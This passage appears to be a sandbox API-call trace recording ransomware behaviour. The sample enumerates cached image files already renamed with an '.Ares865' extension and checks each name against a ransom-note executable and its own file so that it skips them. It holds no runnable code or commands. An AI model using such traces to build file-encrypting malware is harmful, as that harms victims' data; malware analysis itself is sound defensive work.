ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x459f9950, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a6730e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3810, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBCM2U2[1].jpg.Ares865", cAlternateFileName="BBCM2U~1.ARE")) returned 1 [0110.919] lstrcmpiW (lpString1="BBCM2U2[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.919] lstrcmpiW (lpString1="BBCM2U2[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.919] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBCM2U2[1].jpg.Ares865" | out: lpString1="BBCM2U2[1].jpg.Ares865") returned="BBCM2U2[1].jpg.Ares865" [0110.919] lstrlenW (lpString="BBCM2U2[1].jpg.Ares865") returned 22 [0110.919] lstrlenW (lpString="Ares865") returned 7 [0110.919] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.919] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4593b270, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x4593b270, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a6730e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x990, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBDGTbx[1].jpg.Ares865", cAlternateFileName="BBDGTB~1.ARE")) returned 1 [0110.919] lstrcmpiW (lpString1="BBDGTbx[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.919] lstrcmpiW (lpString1="BBDGTbx[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.919] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBDGTbx[1].jpg.Ares865" | out: lpString1="BBDGTbx[1].jpg.Ares865") returned="BBDGTbx[1].jpg.Ares865" [0110.919] lstrlenW (lpString="BBDGTbx[1].jpg.Ares865") returned 22 [0110.919] lstrlenW (lpString="Ares865") returned 7 [0110.919] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.919] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe399c90, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbe399c90, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0x6a699240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x590, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBDk44m[1].png.Ares865", cAlternateFileName="BBDK44~1.ARE")) returned 1 [0110.919] lstrcmpiW (lpString1="BBDk44m[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.919] lstrcmpiW (lpString1="BBDk44m[1].png.Ares865", lpString2="aoldtz.exe") returned 1 [0110.919] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBDk44m[1].png.Ares865" | out: lpString1="BBDk44m[1].png.Ares865") returned="BBDk44m[1].png.Ares865" [0110.919] lstrlenW (lpString="BBDk44m[1].png.Ares865") returned 22 [0110.920] lstrlenW (lpString="Ares865") returned 7 [0110.920] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.920] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45a6bd70, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45a6bd70, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a699240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3010, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBDWXoC[1].jpg.Ares865", cAlternateFileName="BBDWXO~1.ARE")) returned 1 [0110.920] lstrcmpiW (lpString1="BBDWXoC[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.920] lstrcmpiW (lpString1="BBDWXoC[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.920] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBDWXoC[1].jpg.Ares865" | out: lpString1="BBDWXoC[1].jpg.Ares865") returned="BBDWXoC[1].jpg.Ares865" [0110.920] lstrlenW (lpString="BBDWXoC[1].jpg.Ares865") returned 22 [0110.920] lstrlenW (lpString="Ares865") returned 7 [0110.920] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.920] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x458c8e50, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x458c8e50, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a699240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBE3NcH[1].jpg.Ares865", cAlternateFileName="BBE3NC~1.ARE")) returned 1 [0110.920] lstrcmpiW (lpString1="BBE3NcH[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.920] lstrcmpiW (lpString1="BBE3NcH[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.920] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBE3NcH[1].jpg.Ares865" | out: lpString1="BBE3NcH[1].jpg.Ares865") returned="BBE3NcH[1].jpg.Ares865" [0110.920] lstrlenW (lpString="BBE3NcH[1].jpg.Ares865") returned 22 [0110.920] lstrlenW (lpString="Ares865") returned 7 [0110.920] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.920] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x459ad690, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x459ad690, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a6bf3a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x5c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBE7GLE[1].png.Ares865", cAlternateFileName="BBE7GL~1.ARE")) returned 1 [0110.920] lstrcmpiW (lpString1="BBE7GLE[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.920] lstrcmpiW (lpString1="BBE7GLE[1].png.Ares865", lpString2="aoldtz.exe") returned 1 [0110.921] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBE7GLE[1].png.Ares865" | out: lpString1="BBE7GLE[1].png.Ares865") returned="BBE7GLE[1].png.Ares865" [0110.921] lstrlenW (lpString="BBE7GLE[1].png.Ares865") returned 22 [0110.921] lstrlenW (lpString="Ares865") returned 7 [0110.921] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.921] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45ade190, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45ade190, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a6bf3a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1fa0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBE8aLO[1].jpg.Ares865", cAlternateFileName="BBE8AL~1.ARE")) returned 1 [0110.921] lstrcmpiW (lpString1="BBE8aLO[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.921] lstrcmpiW (lpString1="BBE8aLO[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.921] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBE8aLO[1].jpg.Ares865" | out: lpString1="BBE8aLO[1].jpg.Ares865") returned="BBE8aLO[1].jpg.Ares865" [0110.921] lstrlenW (lpString="BBE8aLO[1].jpg.Ares865") returned 22 [0110.921] lstrlenW (lpString="Ares865") returned 7 [0110.921] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.921] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45a45c10, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45a45c10, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a6bf3a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xa10, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEd5bF[1].jpg.Ares865", cAlternateFileName="BBED5B~1.ARE")) returned 1 [0110.921] lstrcmpiW (lpString1="BBEd5bF[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.921] lstrcmpiW (lpString1="BBEd5bF[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.921] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEd5bF[1].jpg.Ares865" | out: lpString1="BBEd5bF[1].jpg.Ares865") returned="BBEd5bF[1].jpg.Ares865" [0110.921] lstrlenW (lpString="BBEd5bF[1].jpg.Ares865") returned 22 [0110.921] lstrlenW (lpString="Ares865") returned 7 [0110.921] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.921] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50ebbff0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x50ebbff0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a6bf3a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xafb0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEdDNm[1].jpg.Ares865", cAlternateFileName="BBEDDN~1.ARE")) returned 1 [0110.921] lstrcmpiW (lpString1="BBEdDNm[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.921] lstrcmpiW (lpString1="BBEdDNm[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.922] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEdDNm[1].jpg.Ares865" | out: lpString1="BBEdDNm[1].jpg.Ares865") returned="BBEdDNm[1].jpg.Ares865" [0110.922] lstrlenW (lpString="BBEdDNm[1].jpg.Ares865") returned 22 [0110.922] lstrlenW (lpString="Ares865") returned 7 [0110.922] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.922] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x458a2cf0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x458a2cf0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a6e5500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xa60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEdpyr[1].jpg.Ares865", cAlternateFileName="BBEDPY~1.ARE")) returned 1 [0110.922] lstrcmpiW (lpString1="BBEdpyr[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.922] lstrcmpiW (lpString1="BBEdpyr[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.922] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEdpyr[1].jpg.Ares865" | out: lpString1="BBEdpyr[1].jpg.Ares865") returned="BBEdpyr[1].jpg.Ares865" [0110.922] lstrlenW (lpString="BBEdpyr[1].jpg.Ares865") returned 22 [0110.922] lstrlenW (lpString="Ares865") returned 7 [0110.922] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.922] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x457e4610, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x457e4610, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a6e5500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1f80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEdQdv[1].jpg.Ares865", cAlternateFileName="BBEDQD~1.ARE")) returned 1 [0110.922] lstrcmpiW (lpString1="BBEdQdv[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.922] lstrcmpiW (lpString1="BBEdQdv[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.922] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEdQdv[1].jpg.Ares865" | out: lpString1="BBEdQdv[1].jpg.Ares865") returned="BBEdQdv[1].jpg.Ares865" [0110.922] lstrlenW (lpString="BBEdQdv[1].jpg.Ares865") returned 22 [0110.922] lstrlenW (lpString="Ares865") returned 7 [0110.922] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.922] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe399c90, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbe399c90, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0x6a6e5500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xd30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEe62t[1].jpg.Ares865", cAlternateFileName="BBEE62~1.ARE")) returned 1 [0110.922] lstrcmpiW (lpString1="BBEe62t[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.922] lstrcmpiW (lpString1="BBEe62t[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.923] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEe62t[1].jpg.Ares865" | out: lpString1="BBEe62t[1].jpg.Ares865") returned="BBEe62t[1].jpg.Ares865" [0110.923] lstrlenW (lpString="BBEe62t[1].jpg.Ares865") returned 22 [0110.923] lstrlenW (lpString="Ares865") returned 7 [0110.923] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.923] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe4ca790, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbe4ca790, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0x6a70b660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1fb0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEedPR[1].jpg.Ares865", cAlternateFileName="BBEEDP~1.ARE")) returned 1 [0110.923] lstrcmpiW (lpString1="BBEedPR[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.923] lstrcmpiW (lpString1="BBEedPR[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.923] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEedPR[1].jpg.Ares865" | out: lpString1="BBEedPR[1].jpg.Ares865") returned="BBEedPR[1].jpg.Ares865" [0110.923] lstrlenW (lpString="BBEedPR[1].jpg.Ares865") returned 22 [0110.923] lstrlenW (lpString="Ares865") returned 7 [0110.923] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.923] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe34d9d0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbe34d9d0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0x6a70b660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xcf0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEeTpB[1].jpg.Ares865", cAlternateFileName="BBEETP~1.ARE")) returned 1 [0110.923] lstrcmpiW (lpString1="BBEeTpB[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.923] lstrcmpiW (lpString1="BBEeTpB[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.923] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEeTpB[1].jpg.Ares865" | out: lpString1="BBEeTpB[1].jpg.Ares865") returned="BBEeTpB[1].jpg.Ares865" [0110.923] lstrlenW (lpString="BBEeTpB[1].jpg.Ares865") returned 22 [0110.923] lstrlenW (lpString="Ares865") returned 7 [0110.923] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.923] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe4ca790, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbe4ca790, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0x6a70b660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEeTuf[1].jpg.Ares865", cAlternateFileName="BBEETU~1.ARE")) returned 1 [0110.923] lstrcmpiW (lpString1="BBEeTuf[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.923] lstrcmpiW (lpString1="BBEeTuf[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.924] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEeTuf[1].jpg.Ares865" | out: lpString1="BBEeTuf[1].jpg.Ares865") returned="BBEeTuf[1].jpg.Ares865" [0110.924] lstrlenW (lpString="BBEeTuf[1].jpg.Ares865") returned 22 [0110.924] lstrlenW (lpString="Ares865") returned 7 [0110.924] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.924] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45b76710, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45b76710, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a7317c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xab0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEeU5U[1].jpg.Ares865", cAlternateFileName="BBEEU5~1.ARE")) returned 1 [0110.924] lstrcmpiW (lpString1="BBEeU5U[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.924] lstrcmpiW (lpString1="BBEeU5U[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.924] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEeU5U[1].jpg.Ares865" | out: lpString1="BBEeU5U[1].jpg.Ares865") returned="BBEeU5U[1].jpg.Ares865" [0110.924] lstrlenW (lpString="BBEeU5U[1].jpg.Ares865") returned 22 [0110.924] lstrlenW (lpString="Ares865") returned 7 [0110.924] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.924] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x456d9c70, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x456d9c70, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a7317c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEf306[1].jpg.Ares865", cAlternateFileName="BBEF30~1.ARE")) returned 1 [0110.924] lstrcmpiW (lpString1="BBEf306[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.924] lstrcmpiW (lpString1="BBEf306[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.924] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEf306[1].jpg.Ares865" | out: lpString1="BBEf306[1].jpg.Ares865") returned="BBEf306[1].jpg.Ares865" [0110.924] lstrlenW (lpString="BBEf306[1].jpg.Ares865") returned 22 [0110.924] lstrlenW (lpString="Ares865") returned 7 [0110.924] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.924] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x459613d0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x459613d0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a7317c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEf54R[1].jpg.Ares865", cAlternateFileName="BBEF54~1.ARE")) returned 1 [0110.924] lstrcmpiW (lpString1="BBEf54R[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.924] lstrcmpiW (lpString1="BBEf54R[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.925] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEf54R[1].jpg.Ares865" | out: lpString1="BBEf54R[1].jpg.Ares865") returned="BBEf54R[1].jpg.Ares865" [0110.925] lstrlenW (lpString="BBEf54R[1].jpg.Ares865") returned 22 [0110.925] lstrlenW (lpString="Ares865") returned 7 [0110.925] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.925] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4587cb90, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x4587cb90, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a757920, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3b60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEfBbH[1].jpg.Ares865", cAlternateFileName="BBEFBB~1.ARE")) returned 1 [0110.925] lstrcmpiW (lpString1="BBEfBbH[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.925] lstrcmpiW (lpString1="BBEfBbH[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.925] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEfBbH[1].jpg.Ares865" | out: lpString1="BBEfBbH[1].jpg.Ares865") returned="BBEfBbH[1].jpg.Ares865" [0110.925] lstrlenW (lpString="BBEfBbH[1].jpg.Ares865") returned 22 [0110.925] lstrlenW (lpString="Ares865") returned 7 [0110.925] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.925] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x457be4b0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x457be4b0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a757920, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1cb0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEfBq0[1].jpg.Ares865", cAlternateFileName="BBEFBQ~1.ARE")) returned 1 [0110.925] lstrcmpiW (lpString1="BBEfBq0[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.925] lstrcmpiW (lpString1="BBEfBq0[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.925] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEfBq0[1].jpg.Ares865" | out: lpString1="BBEfBq0[1].jpg.Ares865") returned="BBEfBq0[1].jpg.Ares865" [0110.925] lstrlenW (lpString="BBEfBq0[1].jpg.Ares865") returned 22 [0110.925] lstrlenW (lpString="Ares865") returned 7 [0110.925] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.925] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45bc29d0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45bc29d0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a757920, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2920, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEfBrz[1].jpg.Ares865", cAlternateFileName="BBEFBR~1.ARE")) returned 1 [0110.925] lstrcmpiW (lpString1="BBEfBrz[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.925] lstrcmpiW (lpString1="BBEfBrz[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.926] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEfBrz[1].jpg.Ares865" | out: lpString1="BBEfBrz[1].jpg.Ares865") returned="BBEfBrz[1].jpg.Ares865" [0110.926] lstrlenW (lpString="BBEfBrz[1].jpg.Ares865") returned 22 [0110.926] lstrlenW (lpString="Ares865") returned 7 [0110.926] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.926] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45b76710, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45b76710, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a757920, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2290, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEfXl6[1].jpg.Ares865", cAlternateFileName="BBEFXL~1.ARE")) returned 1 [0110.926] lstrcmpiW (lpString1="BBEfXl6[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.926] lstrcmpiW (lpString1="BBEfXl6[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.926] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEfXl6[1].jpg.Ares865" | out: lpString1="BBEfXl6[1].jpg.Ares865") returned="BBEfXl6[1].jpg.Ares865" [0110.926] lstrlenW (lpString="BBEfXl6[1].jpg.Ares865") returned 22 [0110.926] lstrlenW (lpString="Ares865") returned 7 [0110.926] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.926] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, 